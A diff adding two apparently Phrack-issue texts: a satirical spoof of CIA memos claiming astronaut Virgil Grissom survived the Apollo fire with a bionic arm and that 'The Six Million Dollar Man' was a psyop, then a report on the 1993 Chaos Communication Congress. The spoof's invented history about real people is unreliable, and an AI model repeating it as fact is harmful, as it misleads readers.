+     By June of 1968, CAPRICORN was recommended and Presidential approval
+given.
+
+
+                                  (2)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+
+
+                                                          DL 433-54-3937
+                                                                10/28/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+
+BACKGROUND, PROJECT CAPRICORN (cont'd)
+----------  ------- ---------
+
+     CAPRICORN was an unqualified success resulting in, among other things,
+later congressional approval for a large appropriation of funds to further
+NASA's successful research.
+
+
+BACKGROUND, PROJECT UMENSCH
+----------  ------- -------
+
+     In February of 1963, DARPA gained oversight of an ancillary NASA research
+project that began with the discovery of efficient micro-machines and light,
+extraordinarily strong alloys.  These new discoveries implied the possibility
+for advance along a relatively new field of science: cybernetics.  DARPA
+reacted enthusiastically by forming project UMENSCH.
+     Most information on UMENSCH, DARPA is unwilling to share.  But this much
+is clear: under the direction of DARPA, NASA got the opportunity to test this
+technology on a human subject with the crash of an experimental flying-wing in
+1966.
+     As his CLASSIFIED service record indicates for the years 1960 - 1965,
+Lieutenant Colonel Virgil Grissom (see Air Force files for Grissom, Virgil I.,
+USAF 563-87-2981; CI DL 118-26-9069) had an exemplary record as an Air Force
+test pilot, including a stint as a U2 pilot during 1956-1959, performing
+reconaissance missions over Cuba and Southeastern China.  In fact, it was
+Grissom's missions which confirmed the mass starvation of over 10 million
+Manchurian Chinese in 1959.
+     Grissom barely survived an XF-17 crash at Edwards Air Force Base,
+September 17, 1966.  His right arm was badly crushed during an emergency
+ejection shortly after take-off.
+     DARPA offered Grissom a chance to regain the limb through risky, untried
+technology: a cybernetically-enhanced prosthetic implant.  DARPA termed the
+marriage of cybernetic implants with biology, BIONICs.
+     The surgery was successful well beyond UMENSCH's projections; not only
+did Grissom's BIONIC arm function as well as his original arm, but in
+conjunction with a BIONICly enhanced upper skeleture, Virgil's right arm was
+capable of lifting several hundred pounds and inflicting marked fatigue in
+steel objects.
+     DARPA's investment of technology and secrets in Virgil Grissom in effect
+made Grissom UMENSCH property and necessarily privy to several sensitive
+projects.
+
+                                  (3)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+
+
+                                                          DL 433-54-3937
+                                                                10/28/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+
+BACKGROUND, PROJECT UMENSCH (cont'd)
+----------  ------- -------
+
+     Colonel Grissom was an obvious astronaut candidate and by the following
+year was training for GEMINI.  In fact, because of Grissom's access to a
+project as sensitive as UMENSCH, Grissom was later tapped to aid in the
+staging of CAPRICORN.
+
+
+THE APOLLO LAUNCHPAD FIRE; GRISSOM, YOUNG, & WHITE
+--- ------ --------- ----  -------  -----  - -----
+
+     You're already well aware of the fire this July on the Apollo launchpad,
+which reportedly killed astronauts Grissom, Young and White.
+     What you are not aware of, however, is that Grissom managed, with the aid
+of BIONICs, to escape the space capsule just before Young and White were
+asphixiated.  It is not clear why Grissom apparently made no attempt to rescue
+his crew-mates or why he used the ensuing confusion to leave Canaveral.
+     For whatever reason, Grissom is now a loose-cannon.  Despite a massive,
+but low-key manhunt, the officially-dead ex-astronaut's whereabouts are
+currently unknown, though we have reason to believe he may have made his way
+to California or Texas.
+     We suspect dissolution with the American space program -- CAPRICORN, in
+particular -- may lead Grissom to go public and compromise UMENSCH and
+CAPRICORN.
+
+BACKGROUND, PROJECT DPULTRA
+----------  ------- -------
+
+       "The most convincing lie is the one that's half true..."
+                       -- Samuel Butler
+
+     DPULTRA is a damage-control project of utmost priority.  Its goal is to
+desensitize the American public to the potential existence of a BIONIC-enabled
+man and secondarily, any allegations concerning CAPRICORN, the ludicrous
+portrayal of the first discrediting the second.
+     PSYOPS' proposed project involves the production of a network television
+show, produced in part with Company funds, Pro-US propagandizing, which will
+lionize the American Intelligence Community and plant the seed in the public's
+mind that projects like CAPRICORN and UMENSCH are impossible -- due to the
+inherent silliness of the show's plotlines, week after week.
+
+                                  (4)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+
+
+                                                          DL 433-54-3937
+                                                                10/28/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+
+BACKGROUND, PROJECT DPULTRA (cont'd)
+----------  ------- -------
+
+     DPULTRA's success is directly related to the Nielsen ratings it can
+garnish and to ensure its success, PSYOPS personnel will be involved in
+writing the scripts.
+     PSYOPS suggests peppering the show's plots with psychological archetypes
+-- symbols from Jung's collective unconscious -- and possibly even subliminals
+(if need be).  The story line will, nevertheless, be played straight but also
+utterly implausibly.
+
+     I would like to discuss DPULTRA further with you in person at our next
+Monday-morning meeting.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+                                  (5)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+
+
+                                                          DL 433-54-3958
+                                                                11/07/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+
+TO:   Thomas J. Kelley, Director, PPYRUS Section
+
+FROM: Bill Brown, PP Deputy Chief
+
+SUBJ: DPULTRA
+
+
+PROJECT DPULTRA OUTLINE
+------- ------- -------
+
+     Following our meeting Monday, this is an update on DPULTRA.
+
+     In keeping with our RMD objectives, we've begun working on ideas this
+week.  Much progress, although finished scripts are probably a month or two
+away, depending on the final series terms from American Broadcasting.
+     Weve settled on character names and sketches:
+
+
+                              DRAMATIS PERSONAE
+
+Dr. Rudy Wells,   An otherwise unremarkable man, the genius behind BIONICs
+Oscar Goldman,    Director of a secret governmental intelligence agency, OSI
+Steve Austin,     Astronaut/Test Pilot/OSI Agent; renowned as the
+                        first Man on the Moon.  Similarity to the name
+                        Sam Houston results from the necessity to attract
+                        Texas viewers particularly (as well as Californians).
+
+
+     Following is a list of show ideas for the first season, along with input
+from the PSYOPS officers.  PSYOPS wants us to plant collective archetypes and
+possibly subliminals in order to carve the show's subtext into the mind as
+deep as possible, and to generate the largest market share possible.
+     These psychological implants will be joined with or disguised under
+ephemeral pop culture references, such as UFOs, Aztecs, Bigfoot, Cold Warrior,
+Earthquakes, the mystique of the American Indian, and the paranormal.
+
+
+
+
+
+
+                                  (1)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+
+                                                          DL 433-54-3958
+                                                                11/07/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+PROJECT DPULTRA OUTLINE (cont'd)
+------- ------- -------
+
+                           SUPPORTING CHARACTERS
+
+Venus Probe,      Earth-launched probe mistakenly returns, wreaking havoc
+Sasquatch,        Otherwise known as "Big Foot"; a UFOnaut with BIONICs
+Farrah Fawcett,   Reporter/Journalist foil for Steve Austin
+Aztec Warrior,    _Chariots of the Gods_ to its ultimate conclusion
+Bionic Boy,       Temporarily BIONIC-enabled
+Gary Savin,       Heretofore unknown, rogue $7 million man
+William Shatner,  ...and dolphins.  "Something Wonderful..." happens to
+                        astronaut Bill on one of his space-walks
+Fembots,          Female grotesques; "All this, and BIONICs, too!"  Evil
+                        androids created by an unnamed, nefarious agency
+
+     Abridged list of possible episodes include:
+
+Sasquatch
+---------
+
+During an OSI science investigation of the San Andreas fault in the wilderness
+of Northern California, Steve encounters Big Foot.  Steve later learns that
+Big Foot is the product of extra-terrestrial genetics and cybernetics, but his
+purpose on Earth is never clarified.  In a later episode, Steve re-visits the
+heavily forrested area and initiates a friendship with Sasquatch, eventually
+saving his life.
+
+Venus Probe
+-----------
+
+An interplanetary probe (like the planned Viking probes) destined for Venus
+slingshots through the alien atmosphere and returns to Earth.  Its computer
+program doesn't realize that anything's wrong, so it begins its collection
+routines.  Unfortunately, it has returned to our planet with an extremely
+tough armor plating (resulting from a chemical reaction with Venus's
+atmosphere) and it's zigzagging its way through Southern California.  It
+possesses wicked collection equipment which in this environment are effective
+weapons.  Anyone who gets near it is in great danger.  Eventually, Steve and
+the national guard defeat the device by luring it into an open pit filled with
+very caustic acid.
+
+
+
+                                  (2)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+                                                          DL 433-54-3958
+                                                                11/07/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+PROJECT DPULTRA OUTLINE (cont'd)
+------- ------- -------
+
+Amnesia
+-------
+
+As the result of a head injury, Steve is stricken with amnesia.  Consequently,
+forgets that he possesses bionic powers.  He ends up living out an alternate
+possible life -- moves in with a woman and gets a job as a construction
+worker.  Everything is fine until Steve happens upon a woman and her child,
+pinned inside a wrecked car.  He tears away the metal and extricates the
+people, who are grateful but become frightened when they see wires sticking
+out of a tear in his flannel shirt.  Eventually, OSI catches up to him before
+anything too out of hand occurs, and Steve regains his memory by episode's
+end.
+
+     If this show is a success in its first season, PSYOPS would like to
+consider a spin-off involving a second BIONIC character.  The spin-off would
+include:
+
+                              ADDITIONAL CHARACTERS
+
+Jamie Sommers,    Substitute Teacher/ex-Tennis Pro; an unlikely OSI agent;
+                        A love-interest for Steve, Jamie obtains her BIONICs
+                        after a parachuting accident
+Max the Dog,      Formerly a laboratory subject, horribly burnt in a fire;
+                        Now BIONIC-enabled.  Psychologically traumatized, Max
+                        goes berserk at the first sign of flame
+
+Jamie Sommers
+-------------
+
+Jamie, a Junior Highschool substitute teacher and ex-Tennis pro, and Steve are
+engaged to be married.  At this point, Jamie knows nothing of Steve's
+involvement with OSI or his BIONIC abilities.  On a vacation parachuting trip,
+Jamie is injured, paralyzed.  Steve pleads with Dr. Wells to restore her limbs
+through BIONICs.  Wells accedes.  Except that Jamie has amnesia and has no
+idea who Steve is.
+     Jamie is instructed in her new BIONIC abilities, and begins to exercise
+them, when her body rejects the BIONIC implants, physically and emotionally
+traumatizing Jamie.  OSI eventually solves the implant rejection problem, but
+Rudi cautions Steve that if he tells her of her past, it may induce the trauma
+of the BIONIC rejection.  Steve lives with the pain of knowing that Jamie is
+his first love and that, for fear of her safety, can never tell her.
+
+                                  (3)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+
+                                                          DL 433-54-3958
+                                                                11/07/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+PROJECT DPULTRA OUTLINE (cont'd)
+------- ------- -------
+
+Aztec Warrior
+----- -------
+
+Investigating an abandoned WW II bunker along the California coast which seems
+to be emitting powerful radio-frequencies, Jamie discovers that an ancient
+Aztec pyramid lies below the bunker's foundation and is now accessible through
+a hidden tunnel.  In the pyramid, Jamie is confronted with an 800-year-old
+Aztec warrior bent on protecting the contents of the pyramid and repelling
+intruders.  In an allusion to CHARIOTS OF THE GODS, extra-terrestrials are
+receiving from the pyramid's beacon the electronic version of an invitation to
+re-visit the planet.  Jamie learns, however, that chemicals seeded into the
+atmosphere as part of a NASA project to end continental drought will
+ultimately interfere with the propulsion system of the alien craft.  Fearing
+the accidental destruction of the aliens will bring extra-terrestrial
+retaliation, Jamie thwarts the Aztec guard and destroys the beacon.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+                                  (4)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+
+                                                          DL 433-54-3958
+                                                                12/10/73
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+
+TO:   Bill Brown, PP Deputy Chief
+
+FROM: Thomas J. Kelley, Director, PPYRUS Section
+
+SUBJ: DPULTRA
+
+
+     Nearly two years into the project, I congratulate you on DPULTRA's
+success; the show has consistently rated high in the Nielsens, topping
+"Starsky & Hutch" and occasionally beating out "M*A*S*H*".
+     However, there seem to be several problems and the show requires a nearly
+intolerable suspension of disbelief.  To wit:
+
+      1.    Running at 60 mph, why doesn't the Bionic Man's sneakers ever
+            wear out?
+      2.    Steve Austin never received a Bionic heart, spine, respiratory
+            system, musculature or skeleture.  How is it that his body
+            doesn't collapse when he lifts objects that weigh tons?
+      3.    Most of Steve's body seems to be metallic; how does he make
+            it past airport metal detectors?
+      4.    How can Steve's Bionics defy principles of physics, like inertia?
+      5.    Steve's Bionic implants are nuclear-powered -- an energy source
+            potentially capable of generating more heat than the sun.  How
+            can Steve's Bionics slow down and even fail, when exposed to cold?
+      6.    Steve Austin's Bionics cost $6 Million -- a sum that seems
+            laughably inexpensive.  Why is the Bionic Woman's pricetag
+            Classified?
+      7.    How can a world-famous, instantly recognizable astronaut make
+            a "perfect undercover agent"?
+      8.    A bionic dog?  What's next?  A bionic earthworm?  A bionic
+            tarantula?
+      9.    Jamie Sommers' cover includes continuing her vocation as a
+            substitute teacher; how does she make time to be a secret agent?
+      10.   Where do the Fembots come from?  Are they important to the show?
+      11.   Re: The Venus Probe episode -- why is a probe whose purpose is
+            to collect soil samples, heavily endowed with weapons?  How can
+            that probe not realize it's not on Venus?  If it's armored enough
+            to withstand the atmosphere of Venus, how was Steve able to
+            destroy it in a pit of acid?  Why was it malevolent?
+ĖUj
+                                J /ƿ=߮~ _^?ξ<=޾~|\H
+                                                                              +
+                                                                              
+
+θ1rG-x^PWOV2/߹3-AF".Ht  s`m}yN|h .x]i
+
+NO CARRIER
+
+------------------------[ END OF FILE ]----------------------------
diff --git a/phrack45/13.txt b/phrack45/13.txt
new file mode 100644
index 0000000..6ea6931
--- /dev/null
+++ b/phrack45/13.txt
@@ -0,0 +1,465 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 13 of 28
+
+****************************************************************************
+
+The 10th Chaos Computer Congress
+
+by Manny E. Farber
+
+  Armed only with an invitation in English addressed to the "global
+community" and a small pile of German Marks, I arrived at the
+Eidelstedter Buergerhaus about an hour or so before the beginning of
+the 10th Chaos Communication Congress (subtitled "Ten years after
+Orwell"), sponsored by the (in)famous Chaos Computer Club.  The
+Buergerhaus (literally, "citizen's house") turned out to be a modest
+community hall; needless to say, not all invited showed up.  The
+Congress took place between the 27th and the 29th of December.  As the
+title implies, social as well as technical issues were on the docket.
+
+  After forking over 30 DM (about $20) for a pass for the first two
+days of the Congress, I sort of felt like asking for a schedule, but
+refrained, thinking that asking for scheduled chaos might seem a bit
+odd.  I went to the cafeteria for breakfast.  An organizer started out
+announcing, "Anyone who wants to eat breakfast pays 5 Marks, and gets a
+stamp, which--no, rather, anyone who wants breakfast pays 5 Marks and
+eats breakfast."
+
+  The atmosphere was quite collegial and informal, with little more
+order than was absolutely necessary.  The approximately 150 attendees
+were predominantly German (a few from Switzerland and Holland, at least
+-- and probably only -- one from the United States, namely myself),
+male, and technically oriented.  (During an explanation of the
+mathematical algorithm underlying electronic cash, a non-techie
+objected, "But I don't want to have to think up a 200-digit random
+number every time I buy something!"  It was explained to him that this
+was done by software in the chip-card ...).
+
+  Although not mentioned in the invitation, not a word of English was to
+be heard; all the events were conducted in German.  Some were conducted
+in a "talk show" format, with a host asking questions, simplifying
+answers, making jokes.  A television network carried the video from the
+auditorium to other rooms throughout the building (albeit without
+sound) along with up-to-the-minute event schedules.
+
+  The tone of the discussions of how electronic cash could be
+embezzled, or chip cards abused, digital signatures forged, etc., was
+constructive rather than destructive.  And it was balanced, i.e. not
+only "how could a malicious individual embezzle money?" was discussed,
+but also "how could the government use chip cards to reduce people's
+privacy?"  Here, the "hackers" were hackers in the positive sense of
+understanding a technology, not in the negative sense of wreaking
+havoc.  It was, however, noted that trying out a potential weakness of
+the "EuroScheck" cash cards was quite easy:  it would require buying a
+card reader for 1,500 DM and maybe a week of time.
+
+  The question of technical solutions to "big brother" did come up in
+the presentations about chip cards.  The danger is that a pile of cards
+is eliminated in favor of a card containing someone's driver's license,
+driving record (maybe), employee information, credit information, etc.
+etc.  A chip card could theoretically be programed to give out *only*
+the information absolutely necessary, e.g. telling a policeman only
+that someone is allowed to drive, without disclosing his identity.
+
+  The "Hackzentrum" (Hacking Center) turned out to be a room filled
+with networked computers and people hacking on them.  It seemed mostly
+harmless.  (I nevertheless did not try a remote login -- I had no
+reason to doubt good intentions, but on the other hand, who knows who
+wrote or replaced the keyboard driver and what sort of supplemental
+functionality it might have?)  The packet radio room had a "Digi"
+repeating station and, true to the ham radio tradition, where the
+conversation centers on who is talking to whom and how well they hear
+each other and on what other frequency they might hear each other
+better, the computers attached were mostly displaying maps of the
+packet radio network itself.  I didn't delve very deeply into the
+"Chaos Archive," but noticed a collection of maintenance sheets for
+telephone equipment among CCC newsletters and other paraphenalia.
+
+  Some "signs of the Congress":
+
+    - Bumper sticker:  "I (heart) your computer"
+    - Telephone stickers:  "Achtung, Abhoergefahr" ("Attention,
+      Eavesdropping danger"; and the German PTT logo transformed into a
+      pirate insignia, with the words "Telefun - Mobilpunk" (derived from
+      "Telefon - Mobilfunk")
+    - T-shirt:  "Watching them (eye-ball) watching us"
+    - Post-It Note pad (for sale for DM 1.50):  a pad of about 50,
+      pre-printed with a hand-written note:  "Vorsicht, Stoerung.
+      Automat macht Karte ungueltig" ("Careful--Defect. Machine makes
+      card invalid")
+    - Word coinage:  "Gopher-space"
+    - Stamp:  "ORIGINALE KOPIE" ("ORIGINAL COPY")
+
+  The press were told not to take pictures of anyone without their
+explicit permission.
+
+  Schedules were distributed throughout the Congress.  By the evening
+of the 27th, a schedule for the 28th, "Fahrplan 28.12 Version 2.0," was
+already available ("Fahrplan" means a bus/train schedule; this is
+presumably an "in" joke).  By 17:30 on the 28th, "Fahrplan 28.12
+Version 2.7" was being distributed.  (I missed most of the intervening
+versions; presumably they were neatly filed away in the Chaos Archive
+by then ...)
+
+  The scheduled events (in translation) were as follows; a "*" means
+that I have included some comments later in this report:
+
+
+December 27, 1993
+
+- Welcoming/opening
+- How does a computer work?
+- ISDN:  Everything over one network
+- Internet and multimedia applications:  MIME/Mosaik/Gopher
+- Data transport for beginners
+- Chip-cards:  Technology
+* Media and information structures:  How much truth remains?  Direct
+  democracy:  information needs of the citizen
+- Encryption for beginners, the practical application of PGP
+* Alternative networks:  ZAMIRNET, APS+Hacktic, Green-Net, Knoopunt,
+  Z-Netz and CL
+
+
+December 28, 1993
+
+- Encryption:  Principles, Systems, and Visions
+- Modacom "wireless modem"
+- Electronic Cash
+- Bulletin board protocols: Functional comparison and social form, with the
+  example of citizen participation
+- Discussion with journalist Eva Weber
+- Net groups for students, Jan Ulbrich, DFN
+* What's left after the eavesdropping attack?  Forbidding encryption?
+  Panel:  Mitglied des Bundestags (Member of Parliament) Peter Paterna,
+  Datenschutz Beauftragter Hamburg (Data privacy official) Peter Schar,
+  a journalist from Die Zeit, a representative from the German PTT, a
+  student writing a book about related issues, and a few members of the
+  Chaos Computer Club
+- Cyber Bla:  Info-cram
+* How does an intelligence service work?  Training videos from the
+  "Stasi" Ministrium fuer STAatsSIcherheit (Ministry for National Security)
+- System theory and Info-policies with Thomas Barth
+- Science Fiction video session:  Krieg der Eispiraten
+  ("War of the ice pirates")
+
+
+December 29, 1993
+
+- Thoughts about organization ("Urheben")
+- Computer recycling
+- Dumbness in the nets:  Electronic warfare
+- Lockpicking:  About opening locks
+- The Arbeitsgemeinschaft freier Mailboxen introduces itself
+- In year 10 after Orwell ... Visions of the hacker scene
+
+
+-------------------------------------------------------------------------------
+THE EAVESDROPING ATTACK
+
+  This has to do with a proposed law making its way through the German
+Parliament.  The invitation describes this as "a proposed law reform
+allowing state authorities to listen in, even in private rooms, in
+order to fight organized crime."  This session was the centerpiece of
+the Congress.  Bayerische Rundfunk, the Bavarian sender, sent a
+reporter (or at least a big microphone with their logo on it).  The
+panel consisted of:
+
+MdB - Mitglied des Bundestags (Member of Parliament) Peter Paterna
+DsB - Datenschutz Beauftragter Hamburg (Data privacy official) Peter Schar
+Journalist - from Die Zeit
+PTT - a representative from the German PTT
+Student - writing a book about related issues
+CCC - a few members of the Chaos Computer Club
+
+  My notes are significantly less than a word-for-word transcript.  In
+the following, I have not only excerpted and translated, but
+reorganized comments to make the threads easier to follow.
+
+
+  IS IT JUSTIFIED?
+
+MdB - There is massive concern ("Beunruhigung") in Germany:  7 million
+crimes last year.  Using the US as comparison for effectiveness of
+eavesdroping, it's only applicable in about 10-20 cases:  this has
+nothing to do with the 7 million.  The congress is nevertheless
+reacting to the 7 million, not to the specifics.  In principle, I am
+opposed and have concerns about opening a Pandora's box.
+
+CCC #1 - The 7 million crimes does not surprise me in the least.  I am
+convinced that there is a clear relationship between the number of laws
+and the number of crimes.  When you make more laws, you have more
+crimes.  Every second action in this country is illegal.
+
+Journalist - Laws/crimes correlation is an over-simplification.  There
+are more murders, even though there are no more laws against it.
+
+MdB - There is a conflict between internal security, protecting the
+constitution, and civil rights.  How dangerous  is 6 billion Marks of
+washed drug money to the nation?  Taking the US as an example, the
+corrosion may have gone so far that it's too late to undo it.  I hope
+that this point hasn't been reached yet in Germany.
+
+DsB - I am worried about a slippery slope.  There is a tradeoff between
+freedom and security, and this is the wrong place to make it; other
+more effective measures aren't being taken up.
+
+
+  EFFECTIVENESS OF CONTROLS ON EAVESDROPING
+
+MdB - Supposedly federal controls are effective.  Although there are
+very few eavesdroping cases, even if you look at those that are
+court-approved, it's increasing exponentially.  No proper brakes are
+built into the system.  As for controls for eavesdroping by the
+intelligence service, there is a committee of  three members of
+parliament, to whom all cases must be presented.  They have final say,
+and I know one of the three, and have relatively much trust in him.
+They are also allowed to go into any PTT facility anytime, unannounced,
+to see whether or not something is being tapped or not.
+
+MdB - Policies for eavesdroping:  if no trace of an applicable
+conversation is heard within the first "n" minutes, they must terminate
+the eavesdroping [...]  The question is, at which point the most
+effective brakes and regulations should be applied:  in the
+constitution?  in the practice?
+
+PTT - True, but often the actual words spoken is not important, rather
+who spoke with whom, and when.
+
+DsB - There is no catalog for crimes, saying what measures can be
+applied in investigating which crimes.  It's quite possible to use them
+for simple crimes, e.g. speeding.  There is no law saying that the PTT
+*has to* store data; they *may*.  They can choose technical and
+organizational solutions that don't require it.
+
+MdB - This is a valid point, I don't waive responsibility for such
+details.  The PTT could be required to wipe out detailed information as
+soon as it is no longer needed, e.g. after the customer has been billed
+for a call.
+
+
+  TECHNICAL TRENDS
+
+Journalist - Digital network techniques make it easy to keep trails,
+and there is an electronic trail produced as waste product, which can
+be used for billing as well as for other purposes.  Load measurements
+are allowable, but it can also be used for tracking movements.
+
+DsB - The PTT claims they need detailed network data to better plan the
+network.  The government says they need details in order to be able to
+govern us better.
+
+DsB - In the past, the trend has always been to increasingly
+identificable phone cards.  There is economic pressure on the customer
+to use a billing card instead of a cash card, since a telephone unit
+costs less.  With "picocells," your movement profile is getting more
+and more visible.
+
+PTT - As for the trend towards less-anonymous billing-cards:  with the
+new ISDN networks, this is necessary.  Billing is a major cost, and
+this is just a technical priority.
+
+Student - As for techniques to reduce potential for eavesdroping, it
+is for example technically possible to address a mobile phone without
+the network operator needing to know its position.  Why aren't such
+things being pursued?
+
+PTT - UMTS is quite preliminary and not necessarily economically
+feasible.  [Comments about debit cards].  We have more interest in
+customer trust than anything else. But when something is according to
+the law, we have no option other than to carry it out.  But we don't do
+it gladly.
+
+
+  THE BIG CONSPIRACY?
+
+CCC #2 - I don't give a shit about these phone conversations being
+overheard.  I want to know why there is such a big controversy.  Who
+wants what?  Why is this so important?  Why so much effort?  Why are so
+many Mafia films being shown on TV when the eavesdroping law is being
+discussed?  What's up?  Why, and who are the people?
+
+Student - I am writing a book about this, and I haven't figured this
+out myself.  My best theory:  there are some politicians who have lost
+their detailed outlook ("Feinbild"), and they should be done away with
+("abgeschaffen").
+
+PTT - We're in a difficult position, with immense investments needed to
+be able to overhear phone conversations [in digital networks (?)].  We
+have no interest in a cover-up.
+
+MdB - As for the earlier question about what NATO countries may do.
+During the occupation of Berlin, they did want they wanted on the
+networks.  In western Germany, it has always been debated.  Funny
+business has never been proved, nor has suspicion been cleared up.
+
+CCC #2 - After further thought, I have another theory.  American
+companies are interested in spying on German companies in order to get
+a jump on their product offerings.
+
+MdB - That's clear, but there are more benign explanations.  Government
+offices tend towards creating work.  Individuals are promoted if their
+offices expand, and they look for new fields to be busy in.  In Bonn,
+we've gone from 4,000 people to 24,000 since the 50's.
+
+CCC #1 (to MdB) - Honestly, I don't see why you people in Bonn are
+anything other than one of these impenetrable bureaucracies like you
+described, inaccessible, out of touch with reality, and interested only
+in justifying their own existence.
+
+MdB - Well, *my* federal government isn't that.
+
+
+  CLIPPER CHIP CONTROVERSY
+
+Student - Observation/concern:  in the US, AT&T's encryption system is
+cheap and weak.  If this becomes a de facto standard, it is much harder
+to introduce a better one later.
+
+Journalist - In the US, the Clipper chip controversy has centered more
+on the lost business opportunities for encryption technology, not on
+principles.  There every suggestion for forbidding encryption has
+encountered stiff opposition.
+
+Student -  As for the Clipper algorithm, it's quite easy to invite
+three experts to cursorily examine an algorithm (they weren't allowed
+to take documents home to study it) and then sign-off that they have no
+complaints.
+
+Journalist - As for the cursory rubber-stamping by the three experts
+who certified the Clipper algorithm, my information is that they had
+multiple days of computing days on a supercomputer available.  I don't
+see a problem with the algorithm.  The problem lies in the "trust
+centers" that manage the keys.  I personally don't see why the whole
+question of cryptology is at all open ("zugaenglich") for the
+government.
+
+
+  CONCLUDING REMARKS
+
+DsB - The question is not only whether or not politicians are separated
+from what the citizens want, but also of what the citizens want.
+Germans have a tendency to valuing security.  Different tradition in
+the US, and less eavesdroping.  I can imagine how the basic law
+("Grundgesetz") could be eliminated in favor of regulations designed to
+reduce eavesdroping, the trade-off you (MdB) mentioned earlier.  The
+headlines would look like "fewer cases of eavesdroping", "checks built
+in to the system," etc., everyone would be happy, and then once the law
+has been abolished, it would creep back up, and then there's no limit.
+
+MdB - (Nods agreement)
+
+CCC #2 - There are things that must be administered centrally (like the
+PTT), and the government is the natural choice, but I suggest that we
+don't speak of the "government," but rather of "coordination."  This
+reduces the perceived "required power" aspect ... As a closing remark,
+I would like to suggest that we take a broader perspective, assume that
+a person may commit e.g. 5,000 DM more of theft in his lifetime, live
+with that, and save e.g. 100,000 DM in taxes trying to prevent this
+degree of theft.
+
+-------------------------------------------------------------------------------
+MEDIA AND INFORMATION STRUCTURES
+
+  In this session, a lot of time was wasted in pointless philosophical
+discussion of what is meant by Truth, although once this topic was
+forcefully ignored, some interesting points came up (I don't
+necessarily agree or disagree with these):
+
+- In electronic media, the receiver has more responsibility for judging
+truth placed on his shoulders.  He can no longer assume that the sender
+is accountable.  With "Network Trust," you would know someone who knows
+what's worthwhile, rather than filtering the deluge yourself.  A
+primitive form of this already exists in the form of Usenet "kill" files.
+
+- A large portion of Usenet blather is due to people who just got their
+accounts cross-posting to the entire world.  The actual posting is not
+the problem, rather that others follow it up with a few dozen messages
+debating whether or not it's really mis-posted, or argue that they
+should stop discussing it, etc.  People are beginning to learn however,
+and the ripple effect is diminishing.
+
+- Companies such as Microsoft are afraid of the Internet, because its
+distributed form of software development means they are no longer the
+only ones able to marshal 100 or 1,000 people for a windowing system
+like X-Windows or Microsoft Windows.
+
+- If someone is trying to be nasty and knows what he's doing, a Usenet
+posting can be made to cost $500,000 in network bandwidth, disk space, etc.
+
+- At a Dutch university, about 50% of the network bandwidth could have
+been saved if copies of Playboy were placed in the terminal rooms.
+Such technical refinements as Gopher caching daemons pale in comparison.
+
+- All e-mail into or out of China goes through one node.  Suspicious,
+isn't it?
+
+-------------------------------------------------------------------------------
+ALTERNATIVE NETWORKS
+
+  Several people reported about computer networks they set up and are
+operating.  A sampling:
+
+  APS+Hacktic - Rop Gonggrijp reported about networking services for the
+masses, namely Unix and Internet for about $15 per month, in Holland.
+There are currently 1,000 subscribers, and the funding is sufficient to
+break even and to expand to keep up with exponential demand.
+
+  A German reported about efforts to provide e-mail to regions of
+ex-Yugoslavia that are severed from one another, either due to
+destroyed telephone lines or to phone lines being shut off by the
+government.  A foundation provided them with the funds to use London
+(later Vienna), which is reachable from both regions, as a common node.
+
+  The original author of the Zerberus mail system used on many private
+German networks complained about the degree of meta-discussion and how
+his program was being used for people to complain about who is paying
+what for networking services and so forth.  He said he did not create
+it for such non-substantial blather.  The difference between now and
+several years ago is that now there are networks that work,
+technically, and the problem is how to use them in a worthwhile manner.
+
+  A German of Turkish origin is trying to allow Turks in Turkey to
+participate in relevant discussions on German networks (in German) and
+is providing translating services (if I heard right, some of this
+was being done in Sweden).  This killed the rest of the session,
+which degenerated into a discussion of which languages were/are/should
+be used on which networks.
+
+-------------------------------------------------------------------------------
+HOW AN INTELLIGENCE SERVICE WORKS:  STASI TRAINING VIDEOS
+
+  The person introducing the videos sat on the stage, the room
+darkened.  The camera blotted out his upper body and face; all that was
